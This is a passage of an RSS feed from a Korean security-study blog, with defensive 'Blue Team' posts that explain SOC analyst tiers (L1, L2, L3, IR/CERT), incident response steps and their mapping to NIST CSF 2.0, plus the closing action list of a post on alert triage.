&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;4. Action (권고 조치)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 누가 무엇을 해야 하는지 제안&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- &lt;span style=&quot;color: #006dd7;&quot;&gt;ex)&lt;/span&gt; 해당 계정의 강제 종료 및 잠금 처리&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- &lt;span style=&quot;color: #006dd7;&quot;&gt;ex)&lt;/span&gt; 로그인 직후 수행된 파일 접근 및 명령어 기록 조사&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- &lt;span style=&quot;color: #006dd7;&quot;&gt;ex)&lt;/span&gt; L2 심층 분석 팀 및 IR&lt;span style=&quot;color: #9d9d9d;&quot;&gt;(사고대응)&lt;/span&gt; 팀에 즉시 통보&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;[Blue Team] EP.3 - Alert 판단. &lt;span style=&quot;color: #ee2323;&quot;&gt;END.&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #222222; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #333333;&quot;&gt;[Blue Team] EP.4 - 보안 도구들. Continue...&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #222222; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;a href=&quot;https://anbymata.tistory.com/66&quot; target=&quot;_blank&quot; rel=&quot;noopener&amp;nbsp;noreferrer&quot;&gt;https://anbymata.tistory.com/66&lt;/a&gt;&lt;/b&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1776668902171&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;article&quot; data-og-title=&quot;[Blue Team] EP.4 - 보안 도구들&quot; data-og-description=&quot;[4-1] SOC의 주요 보안 도구들SIEM (Security Information and Event Management)- 중앙 관제 플랫폼- 인프라 전체의 로그 수집- 로그들을 정구화하고 상관관계를 분석하여 위협 탐지- 범위: 전체 인프라를 넓게 &quot; data-og-host=&quot;anbymata.tistory.com&quot; data-og-source-url=&quot;https://anbymata.tistory.com/66&quot; data-og-url=&quot;https://anbymata.tistory.com/66&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/i6mjk/dJMb84X0MmW/rkLivN3Ot1huygd9pHujqK/img.png?width=800&amp;amp;height=800&amp;amp;face=0_0_800_800,https://scrap.kakaocdn.net/dn/ldzcu/dJMb81fUEWG/mS7qvcpie0IeYKnVu8AKj0/img.png?width=800&amp;amp;height=800&amp;amp;face=0_0_800_800,https://scrap.kakaocdn.net/dn/egi46p/dJMb8TCbGbJ/WNui4UVeksFBlBamjc6KS1/img.png?width=686&amp;amp;height=840&amp;amp;face=0_0_686_840&quot;&gt;&lt;a href=&quot;https://anbymata.tistory.com/66&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://anbymata.tistory.com/66&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/i6mjk/dJMb84X0MmW/rkLivN3Ot1huygd9pHujqK/img.png?width=800&amp;amp;height=800&amp;amp;face=0_0_800_800,https://scrap.kakaocdn.net/dn/ldzcu/dJMb81fUEWG/mS7qvcpie0IeYKnVu8AKj0/img.png?width=800&amp;amp;height=800&amp;amp;face=0_0_800_800,https://scrap.kakaocdn.net/dn/egi46p/dJMb8TCbGbJ/WNui4UVeksFBlBamjc6KS1/img.png?width=686&amp;amp;height=840&amp;amp;face=0_0_686_840');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;[Blue Team] EP.4 - 보안 도구들&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;[4-1] SOC의 주요 보안 도구들SIEM (Security Information and Event Management)- 중앙 관제 플랫폼- 인프라 전체의 로그 수집- 로그들을 정구화하고 상관관계를 분석하여 위협 탐지- 범위: 전체 인프라를 넓게&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;anbymata.tistory.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;</description>
      <category>Blue Team (SOC)/SOC 기초 개념</category>
      <category>Blue Team</category>
      <category>cert</category>
      <category>IR</category>
      <category>SoC</category>
      <category>보안관제</category>
      <category>블루팀</category>
      <category>정보보안</category>
      <category>정보보호</category>
      <category>해킹 스터디</category>
      <author>AnbyMata</author>
      <guid isPermaLink="true">https://anbymata.tistory.com/65</guid>
      <comments>https://anbymata.tistory.com/65#entry65comment</comments>
      <pubDate>Thu, 16 Apr 2026 22:00:44 +0900</pubDate>
    </item>
    <item>
      <title>[Blue Team] EP.2 - L1, L2, L3, IR/CERT</title>
      <link>https://anbymata.tistory.com/64</link>
      <description>&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[2-1] 대표적인 SOC 운영 구조&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;L1 &lt;/b&gt;- Alert Triage&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;역할:&lt;/span&gt; &lt;b&gt;1차 분류 및 모니터링&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 대량 알람 중 실제 위협 후보를 선별&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;L2&lt;/b&gt; - Deep Analysis&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;역할:&lt;/span&gt; &lt;b&gt;상세 분석&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 위협의 침투 범위 파악 및 실제 칩입 여부 최종 판단&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;L3&lt;/b&gt; - Detection Engineering&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;역할:&lt;/span&gt; &lt;b&gt;헌팅 및 룰 개선&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 능동적으로 위협을 찾음 (= Threat Hunting)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 탐지 공백을 메우는 룰 작성&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;IR/CERT&lt;/b&gt; - Incident Response&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- &lt;span style=&quot;color: #006dd7;&quot;&gt;역할:&lt;/span&gt; &lt;b&gt;실제 대응 및 복구&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;- 시스템 격리, 포렌식, 피해복구 및 사후 보고서 작성&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[2-2] IR/CERT의 미션&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;IR &lt;/b&gt;(Incident Response) =&lt;b&gt; 사고 대응 팀&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;CERT &lt;/b&gt;=&lt;b&gt; 침해사고 대응 팀&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&amp;rarr;&amp;nbsp;&lt;/b&gt;단순 분석이 이닌 위협을 통제하고 시스템을 정상 상태로 복구하는 팀&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;1. &lt;b&gt;Contain&lt;span style=&quot;color: #9d9d9d;&quot;&gt; (억제)&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 계정 잠금, 호스트 격리, IP 차단 등으로 공격자가 더 이상 활동할 수 없게 함&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;2. &lt;b&gt;Eradicate&lt;span style=&quot;color: #9d9d9d;&quot;&gt; (제거)&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 침투의 원인이 된 취약점 제거 및 악성 프로세스 삭제&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;3. &lt;b&gt;Recover&lt;span style=&quot;color: #9d9d9d;&quot;&gt; (복구)&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 서비스 정상화 및 동일 공격 재발 방지를 위한 보완&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;4. &lt;b&gt;Improve&lt;/b&gt; &lt;span style=&quot;color: #9d9d9d;&quot;&gt;&lt;b&gt;(개선)&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 사후 분석을 통해 관제 룰 개선 및 보안 체계 강화&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;[2-3] NIST CSF 2.0으로 본 SOC 계측별 역할&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;1. Detect &lt;span style=&quot;color: #9d9d9d;&quot;&gt;(탐지)&lt;/span&gt; &lt;/b&gt;- SOC의 존재 이유인 위협 발견/탐지&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 모든 계층이 관여&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&amp;nbsp;- &lt;span style=&quot;color: #006dd7;&quot;&gt;L1&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;color: #333333;&quot;&gt;(&lt;b&gt;분류&lt;/b&gt;)&lt;/span&gt; &amp;amp;&lt;b&gt; &lt;span style=&quot;color: #006dd7;&quot;&gt;L3&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;color: #333333;&quot;&gt;(&lt;b&gt;엔지니어링&lt;/b&gt;)&lt;/span&gt;&lt;b&gt;: &lt;/b&gt;탐지의 핵심. L1은 실시간 알람을 선별하고, L3는 새로운 탐지 룰을 설계해 공격 감지&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&amp;nbsp;- &lt;span style=&quot;color: #006dd7;&quot;&gt;L2&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;color: #333333;&quot;&gt;(&lt;b&gt;분석&lt;/b&gt;)&lt;/span&gt;&lt;b&gt;:&lt;/b&gt; 발견된 위협이 진짜인지 심층 분석하며 탐지 지원&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&amp;nbsp;- &lt;span style=&quot;color: #006dd7;&quot;&gt;IR/CERT&lt;/span&gt;: &lt;/b&gt;부분적으로 참여. 실제 상황 발생시 가동될 준비&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;2. Respond&lt;span style=&quot;color: #9d9d9d;&quot;&gt; (대응) &lt;/span&gt;&lt;/b&gt;- 공격의 확산을 막고 조치하는 단계&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;- 뒤로 갈수록 책임이 무거움&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&amp;nbsp;- &lt;span style=&quot;color: #006dd7;&quot;&gt;IR/CERT&lt;/span&gt;:&lt;/b&gt; 대응의 핵심. 시스템 격리나 차단 등의 실제 액션을 수행&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&amp;nbsp;- &lt;span style=&quot;color: #006dd7;&quot;&gt;L2&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;color: #333333;&quot;&gt;(&lt;b&gt;분석&lt;/b&gt;)&lt;/span&gt;&lt;b&gt;: &lt;/b&gt;분석 결과를 토대로 대응 방향 결정. 주요 파트너 역할&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&amp;nbsp;- &lt;span style=&quot;color: #006dd7;&quot;&gt;L1&lt;/span&gt;&lt;/b&gt;(&lt;b&gt;분류&lt;/b&gt;) &amp;amp;&lt;b&gt; &lt;span style=&quot;color: #006dd7;&quot;&gt;L3&lt;/span&gt;&lt;/b&gt;(&lt;b&gt;엔지니어링&lt;/b&gt;)&lt;b&gt;: &lt;/b&gt;상황 전파 및 기술적 지원 수행. 부분적 참여&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;3. Recover &lt;span style=&quot;color: #9d9d9d;&quot;&gt;(복구) &lt;/span&gt;&lt;/b&gt;- 사고 이후 시스템 정상화&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&amp;nbsp;- &lt;span style=&quot;color: #006dd7;&quot;&gt;IR/CERT&lt;/span&gt;: &lt;/b&gt;복구의 중심. 서비스 정상화와 재발 방지 대책 수립을 주도&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&amp;nbsp;- &lt;span style=&quot;color: #006dd7;&quot;&gt;L2&lt;/span&gt;&lt;/b&gt;(&lt;b&gt;분석&lt;/b&gt;) &amp;amp;&lt;b&gt; &lt;span style=&quot;color: #006dd7;&quot;&gt;L3&lt;/span&gt;&lt;/b&gt;(&lt;b&gt;엔지니어링&lt;/b&gt;)&lt;b&gt;: &lt;/b&gt;복구 과정에서 필요한 분석 데이터나 개선된 보안 설정을 제공하며 도움&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&amp;nbsp;- &lt;span style=&quot;color: #006dd7;&quot;&gt;L1&lt;/span&gt;&lt;/b&gt;(&lt;b&gt;분류&lt;/b&gt;)&lt;b&gt;: &lt;/b&gt;복구 단계에서는 관여도가 낮음&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;4. Identify &lt;span style=&quot;color: #9d9d9d;&quot;&gt;(식별) &lt;/span&gt;&lt;/b&gt;- 자산 및 위험 파악 단계&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&amp;nbsp;- &lt;span style=&quot;color: #006dd7;&quot;&gt;L3&lt;/span&gt;&lt;/b&gt;(&lt;b&gt;엔지니어링&lt;/b&gt;)&lt;b&gt;: &lt;/b&gt;탐지 룰을 만들기 위해 자산의 특성과 위협 모델 분석&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&amp;nbsp;- &lt;span style=&quot;color: #006dd7;&quot;&gt;L2&lt;/span&gt;&lt;/b&gt;(&lt;b&gt;분석&lt;/b&gt;) &amp;amp;&lt;b&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt; IR&lt;/span&gt;: &lt;/b&gt;사고 분석과 대응 과정에서 파악된 자산 정보를 업데이트. 부분적 참여&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&amp;nbsp;- &lt;span style=&quot;color: #006dd7;&quot;&gt;L1&lt;/span&gt;&lt;/b&gt;(&lt;b&gt;분류&lt;/b&gt;)&lt;b&gt;: &lt;/b&gt;식별 단계에서는 관여도가 낮음&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;L1&lt;/span&gt;&lt;/b&gt;(&lt;b&gt;분류&lt;/b&gt;)&lt;b&gt; - 탐지&lt;/b&gt;에 집중&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;L2&lt;/span&gt;&lt;/b&gt;(&lt;b&gt;분석&lt;/b&gt;)&lt;b&gt; - 탐지&lt;/b&gt;와&lt;b&gt; 대응&lt;/b&gt; 사이에서 분석의 교량 역할&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;L3&lt;/span&gt;&lt;/b&gt;(&lt;b&gt;엔지니어링&lt;/b&gt;)&lt;b&gt; - 탐지&lt;/b&gt;와 &lt;b&gt;식별&lt;/b&gt;을 통해 방어 체계의 기반 설계&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;IR/CERT -&lt;/span&gt; 대응&lt;/b&gt;과&lt;b&gt; 복구&lt;/b&gt;라는 최종 해결사 역할&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;[Blue Team] EP.2 - L1,&amp;nbsp;L2,&amp;nbsp;L3,&amp;nbsp;IR/CERT. &lt;span style=&quot;color: #ee2323;&quot;&gt;END.&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #222222; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;[Blue Team] EP.3 - Alert 판단. Continue...&lt;/b&gt;&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #222222; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;a href=&quot;https://anbymata.tistory.com/65&quot; target=&quot;_blank&quot; rel=&quot;noopener&amp;nbsp;noreferrer&quot;&gt;https://anbymata.tistory.com/65&lt;/a&gt;&lt;/b&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1776668803567&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;article&quot; data-og-title=&quot;[Blue Team] EP.3 - Alert 판단&quot; data-og-description=&quot;[3-1] Log, Event, Alert, Incident1단계 - Log (로그)- 시스템이 남긴 원시 기록 (의미 없는 사실)- ex) 11:10에 검정색 후드를 입은 남성이 건물에 출입함 2단계 - Event (이벤트)- 의미를 해석한 단위 행위 (의미 &quot; data-og-host=&quot;anbymata.tistory.com&quot; data-og-source-url=&quot;https://anbymata.tistory.com/65&quot; data-og-url=&quot;https://anbymata.tistory.com/65&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/KEDyI/dJMb8T91w43/K0CuvwUfhm5wCvHN1kp381/img.png?width=800&amp;amp;height=800&amp;amp;face=0_0_800_800,https://scrap.kakaocdn.net/dn/bOTcUU/dJMb8XkhoNf/pVx5tXb8AHvCJchh1tJRek/img.png?width=800&amp;amp;height=800&amp;amp;face=0_0_800_800,https://scrap.kakaocdn.net/dn/d1vYfR/dJMb8ZvDtUy/tF0WTbKLg9smECIjnrTHR1/img.png?width=686&amp;amp;height=840&amp;amp;face=0_0_686_840&quot;&gt;&lt;a href=&quot;https://anbymata.tistory.com/65&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://anbymata.tistory.com/65&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/KEDyI/dJMb8T91w43/K0CuvwUfhm5wCvHN1kp381/img.png?width=800&amp;amp;height=800&amp;amp;face=0_0_800_800,https://scrap.kakaocdn.net/dn/bOTcUU/dJMb8XkhoNf/pVx5tXb8AHvCJchh1tJRek/img.png?width=800&amp;amp;height=800&amp;amp;face=0_0_800_800,https://scrap.kakaocdn.net/dn/d1vYfR/dJMb8ZvDtUy/tF0WTbKLg9smECIjnrTHR1/img.png?width=686&amp;amp;height=840&amp;amp;face=0_0_686_840');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;[Blue Team] EP.3 - Alert 판단&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;[3-1] Log, Event, Alert, Incident1단계 - Log (로그)- 시스템이 남긴 원시 기록 (의미 없는 사실)- ex) 11:10에 검정색 후드를 입은 남성이 건물에 출입함 2단계 - Event (이벤트)- 의미를 해석한 단위 행위 (의미&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;anbymata.tistory.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;</description>
      <category>Blue Team (SOC)/SOC 기초 개념</category>
      <category>Blue Team</category>
      <category>cert</category>
      <category>IR</category>
      <category>SoC</category>
      <category>보안관제</category>
      <category>블루팀</category>
      <category>정보보안</category>
      <category>정보보호</category>
      <category>해킹 스터디</category>
      <author>AnbyMata</author>
      <guid isPermaLink="true">https://anbymata.tistory.com/64</guid>
      <comments>https://anbymata.tistory.com/64#entry64comment</comments>
      <pubDate>Wed, 15 Apr 2026 22:00:55 +0900</pubDate>
    </item>
  </channel>
</rss>